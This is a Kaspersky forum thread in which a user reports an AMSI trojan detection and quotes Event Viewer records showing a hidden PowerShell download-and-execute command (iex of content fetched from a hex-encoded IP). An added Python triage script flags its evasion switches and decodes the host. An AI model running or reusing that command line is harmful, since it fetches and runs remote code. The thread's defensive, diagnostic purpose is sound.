Hi. So, Kaspersky has detected powershell.exe as a malicious object. It says the object was uid:/amsi_stream_4, a trojan.

I've checked Event Viewer and I have two warnings at the time I got a PowerShell window popping up on my screen, with the source being "avp", and the info/details I have are:

Number: "45399392" Name: "32d87a95" Confidence: "00000000" ProcessSha256: "9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3" ProcessPath: "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ProcessCommandLine: ""powershell.exe" -nop -exec bypass -w hidden -command "iex(irm 0xc0.0x6d.0xc8.0x3f/event)"" Bases: "2026.02.21 19:23:00:000"

And:

Number: "45399392" Name: "aa81fd45" Confidence: "00000006" ProcessSha256: "9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3" ProcessPath: "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ProcessCommandLine: ""powershell.exe" -nop -exec bypass -w hidden -command "iex(irm 0xc0.0x6d.0xc8.0x3f/event)"" Bases: "2026.02.21 19:23:00:000"

Could someone please help me understand what I am dealing with here? Thanks in advance.
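
A defender's triage of the command line logged in the event records above, added here as an example and not part of the original post: it flags the launcher parameters and rewrites the hex-octet host into dotted decimal so it can be searched for in proxy or firewall logs. The function names and finding labels are hypothetical, and the parameter-prefix table is an assumption based on the abbreviations powershell.exe accepts.

```python
import ipaddress
import re

# Excerpt of one "avp" event record quoted in the post (fields copied verbatim).
EVENT = r'''ProcessCommandLine: ""powershell.exe" -nop -exec bypass -w hidden -command "iex(irm 0xc0.0x6d.0xc8.0x3f/event)"" Bases: "2026.02.21 19:23:00:000"'''
CMDLINE_RE = re.compile(r'ProcessCommandLine: "(.*?)"(?= Bases:|$)')
PARAMS = {"noprofile": "nop", "executionpolicy": "ex", "windowstyle": "w",
          "encodedcommand": "e", "command": "c"}  # name -> shortest accepted prefix
RULES = {"noprofile": None, "encodedcommand": None,  # None: flag whenever present
         "executionpolicy": {"bypass", "unrestricted"}, "windowstyle": {"hidden"}}
FETCH_RE = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+"
                      r"['\"]?(?:https?://)?([^/:\s'\")]+)", re.I)

def param_name(token):
    t = token.lstrip("-").lower()
    return next((n for n, s in PARAMS.items() if n.startswith(t) and t.startswith(s)), None)

def normalize_ipv4(host):
    """Dotted-decimal form of an inet_aton-style host (hex/octal/short), else None."""
    nums = []
    for part in host.split("."):
        m = re.fullmatch(r"(0[xX][0-9a-fA-F]+)|(0[0-7]*)|([1-9][0-9]*)", part)
        if not m:
            return None
        nums.append(int(part, 16 if m.group(1) else 8 if m.group(2) else 10))
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if len(nums) > 4 or any(n > 255 for n in nums[:-1]) or nums[-1] >> 8 * (5 - len(nums)):
        return None
    return str(ipaddress.IPv4Address(nums[-1] + sum(n << (24 - 8 * i) for i, n in enumerate(nums[:-1]))))

def triage(event):
    m = CMDLINE_RE.search(event)
    toks, found, script = (m.group(1).split() if m else []), [], ""
    for i, tok in enumerate(toks):
        name = param_name(tok) if tok.startswith("-") else None
        arg = toks[i + 1].strip('"').lower() if i + 1 < len(toks) else ""
        if name == "command":  # everything after -command is the script text
            script = " ".join(toks[i + 1:])
            break
        if name in RULES and (RULES[name] is None or arg in RULES[name]):
            found.append(name if RULES[name] is None else f"{name}={arg}")
    fetch = FETCH_RE.search(script)
    ip = normalize_ipv4(fetch.group(1)) if fetch else None
    if fetch and re.search(r"\b(?:iex|invoke-expression)\b", script, re.I):
        found.append("download-and-execute")  # fetched content is passed to iex
    if ip and ip != fetch.group(1):
        found.append(f"non-canonical-ipv4={ip}")
    return found
```

Calling `triage(EVENT)` returns the list of findings for the record; `normalize_ipv4` also handles octal and single-integer host forms, which goes beyond the hex case seen in the post.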

harlan4096

Welcome to Kaspersky Community.

Please provide the version of K. and operating system.

Can you attach, from your Kaspersky Reports, captures of the details of those detections?
